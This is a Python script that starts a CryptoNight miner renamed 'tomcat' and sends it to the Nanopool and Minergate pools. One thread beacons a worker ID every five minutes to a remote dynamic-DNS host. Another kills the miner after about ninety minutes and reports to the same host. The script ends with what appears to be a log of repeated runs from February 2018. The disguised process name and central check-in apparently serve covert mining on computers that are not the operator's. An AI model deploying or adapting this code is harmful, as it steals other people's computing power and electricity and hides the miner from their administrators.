import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:28:01.285256
#2018-02-17 17:15:08.808128
#2018-02-17 19:04:05.691612
#2018-02-17 20:53:06.197003
#2018-02-17 22:40:06.243757
#2018-02-18 00:23:07.181773
#2018-02-18 02:14:07.265717
#2018-02-18 04:01:05.117358
#2018-02-18 05:49:03.597040
#2018-02-18 07:41:01.774691
#2018-02-18 09:28:01.783408
#2018-02-18 11:14:03.747643
#2018-02-18 13:01:03.690364
#2018-02-18 14:48:03.834154
#2018-02-18 16:35:08.818323
#2018-02-18 18:24:03.971127
#2018-02-18 20:09:06.695612
#2018-02-18 21:56:01.375714
#2018-02-18 23:45:01.583455
#2018-02-19 01:31:01.600513
#2018-02-19 03:20:04.955898
#2018-02-19 05:05:07.769419
#2018-02-19 06:51:06.121687
#2018-02-19 08:40:07.369074
#2018-02-19 10:29:06.052959
#2018-02-19 12:17:08.566769
#2018-02-19 14:04:04.213244
#2018-02-19 15:53:01.632379
#2018-02-19 17:40:10.116336
#2018-02-19 19:27:07.884791
#2018-02-19 21:13:02.107047
#2018-02-19 23:01:07.037521
#2018-02-20 00:45:03.189113
#2018-02-20 02:37:01.917877
#2018-02-20 04:25:09.257906
#2018-02-20 06:10:07.962296
#2018-02-20 07:55:03.248117
#2018-02-20 09:40:04.682287
#2018-02-20 11:24:06.551258
#2018-02-20 13:10:10.099914
#2018-02-20 14:54:09.280893
#2018-02-20 16:40:09.527938
#2018-02-20 18:27:04.837717
#2018-02-20 20:18:07.461623
#2018-02-20 22:04:08.027561
#2018-02-20 23:45:10.774414
#2018-02-21 01:29:06.466710
#2018-02-21 03:18:04.759896
#2018-02-21 05:06:04.001542
#2018-02-21 06:54:05.149434
#2018-02-21 08:40:05.140566
#2018-02-21 10:25:06.732158
#2018-02-21 12:12:07.374077
#2018-02-21 14:00:13.991878
#2018-02-21 15:46:04.988295
#2018-02-21 17:38:02.220526
#2018-02-21 19:24:04.559247
#2018-02-21 21:11:08.292950
#2018-02-21 22:58:01.429212
#2018-02-22 00:48:04.550707
#2018-02-22 02:35:06.990595
#2018-02-22 04:21:01.573236
#2018-02-22 06:07:06.628328
#2018-02-22 07:52:01.619792
#2018-02-22 09:40:11.648381
#2018-02-22 11:25:06.203979
#2018-02-22 13:09:08.083462
#2018-02-22 14:58:06.115036
#2018-02-22 16:44:13.243779
#2018-02-22 18:29:01.936724
#2018-02-22 20:22:07.751593
#2018-02-22 22:09:07.460867
#2018-02-22 23:56:01.819405
#2018-02-23 01:44:07.121774
#2018-02-23 03:33:01.890699
#2018-02-23 05:19:01.388672
#2018-02-23 07:06:01.692884
#2018-02-23 08:56:08.120474
#2018-02-23 11:13:08.582065
#2018-02-23 13:08:06.397996
#2018-02-23 14:53:02.128170
#2018-02-23 16:43:02.267013
#2018-02-23 18:29:04.160561
#2018-02-23 20:15:07.739405
#2018-02-23 22:04:04.485404
#2018-02-23 23:53:04.245722
#2018-02-24 01:44:06.847154
#2018-02-24 03:36:01.947087
#2018-02-24 05:20:06.775619
#2018-02-24 07:08:08.105642
#2018-02-24 08:55:07.020200
#2018-02-24 10:56:04.869105
#2018-02-24 12:44:06.761665
#2018-02-24 14:34:07.499002
#2018-02-24 16:20:09.046263
#2018-02-24 18:14:03.387987
#2018-02-24 20:01:02.204537
#2018-02-24 21:43:05.666891
#2018-02-25 00:39:05.985894
#2018-02-25 04:08:05.552438
#2018-02-25 07:39:07.405475